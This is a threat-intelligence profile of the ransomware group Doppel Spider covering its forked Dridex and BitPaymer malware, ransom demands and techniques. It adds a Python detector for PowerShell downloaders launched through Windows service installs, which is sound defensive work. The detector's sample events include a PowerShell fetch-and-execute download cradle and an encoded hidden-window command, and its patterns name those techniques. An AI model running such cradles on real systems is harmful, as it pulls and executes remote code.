Eastern Europe, Russian Federation
Doppel Spider is a criminal actor group that has been operating since circa April 2019 and is responsible for the operation of the malware families named DoppelDridex and DoppelPaymer.
CrowdStrike Intelligence identified that DoppelPaymer is based on a fork of the BitPaymer source code and DoppelDridex is a modified version of the Dridex malware. BitPaymer and Dridex are developed and operated by the criminal actor Indrik Spider.
DoppelDridex is a fork of Indrik Spider's Dridex malware. DoppelDridex is run as a parallel operation to Dridex, with a different malware versioning system, a different RSA key, and different infrastructure. In June 2019, parallel operations of BitPaymer and DoppelPaymer were identified; this, coupled with the significant code overlap between the two ransomware families, indicates not only a fork of the BitPaymer code base but two entirely separate operations.
CrowdStrike Intelligence assesses with high confidence that Doppel Spider has splintered from Indrik Spider and is now using forked malware code to run their own Big Game Hunting operations.
Doppel Spider has become increasingly bold in its ransom demands through 2020, with ransoms often equating to several million USD and, in at least one case during 2020, a demand of over $1B USD.
- P2P communications
- DoppelDridex uses XOR/RSA/RC4 encryption
- Use of Dridex modules during compromise of the victim’s network
- Use of services to launch PowerShell Empire downloader scripts
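As an added example (not CrowdStrike's code and not taken from the actor profile), the following Python shows one defender-side check for the last TTP above: it parses Windows service-installation events (System log Event ID 7045) and flags any whose ImagePath launches PowerShell with downloader or obfuscation indicators. The key=value line layout, hostnames, service names and the encoded-command payload are all constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample events modelled on System log Event ID 7045
# ("A service was installed in the system"). The key=value layout is an
# assumption for this example, not the output of any specific tool.
SAMPLE_EVENTS = [
    'EventID=7045 Host=WS01 ServiceName="Print Helper" '
    'ImagePath="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A" Account=LocalSystem',
    'EventID=7045 Host=WS02 ServiceName="Backup Agent" '
    'ImagePath="C:\\Program Files\\Backup\\agent.exe /svc" Account=LocalSystem',
    'EventID=7045 Host=WS03 ServiceName="Updater" '
    "ImagePath=\"cmd.exe /c powershell -noni IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/x')\" Account=LocalSystem",
    'EventID=7036 Host=WS01 ServiceName="Print Helper" State=running',
]

# Indicators that a service binary path uses PowerShell as a downloader or
# stager. PowerShell accepts unambiguous switch prefixes, so the patterns
# cover the short forms too (-e/-ec/-enc, -nop, -noni, -w hidden).
INDICATORS = [
    ("encoded_command", r"(?<!\S)-e(?:c|n[a-z]*)?\b"),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden"),
    ("no_profile", r"-nop(?:rofile)?\b"),
    ("non_interactive", r"-noni(?:nteractive)?\b"),
    ("download_cradle",
     r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|bitstransfer"),
    ("invoke_expression", r"\biex\b|invoke-expression"),
]
POWERSHELL_RE = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass
class Finding:
    host: str
    service: str
    image_path: str
    indicators: list


def parse_event(line: str) -> dict:
    """Split a key=value event line into a dict; quoted values keep their spaces."""
    return {key: (quoted or bare) for key, quoted, bare in KV_RE.findall(line)}


def inspect_event(event: dict):
    """Return a Finding for a service install whose ImagePath runs PowerShell
    with at least one downloader/obfuscation indicator, else None."""
    if event.get("EventID") != "7045":
        return None
    path = event.get("ImagePath", "")
    if not POWERSHELL_RE.search(path):
        return None
    hits = [label for label, pattern in INDICATORS
            if re.search(pattern, path, re.IGNORECASE)]
    if not hits:
        return None  # plain PowerShell service: worth reviewing, not alerting on
    return Finding(event.get("Host", "?"), event.get("ServiceName", "?"), path, hits)


def scan(lines) -> list:
    """Run inspect_event over raw log lines and collect the findings."""
    findings = []
    for line in lines:
        finding = inspect_event(parse_event(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: service '{f.service}' -> {', '.join(f.indicators)}")
```

Event ID 7036 (service state change) is ignored because only the installation event carries the binary path; in a real deployment the same check applies to Sysmon Event ID 1 where the parent is services.exe, and the indicator list is the part to tune against your own baseline of legitimate PowerShell-based services.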
United Arab Emirates
- Consulting & Professional Services
- Consumer Goods
- Food and Beverage
- Industrials and Engineering
- Media, NGOs and Nonprofits
- Oil and Gas
- Real Estate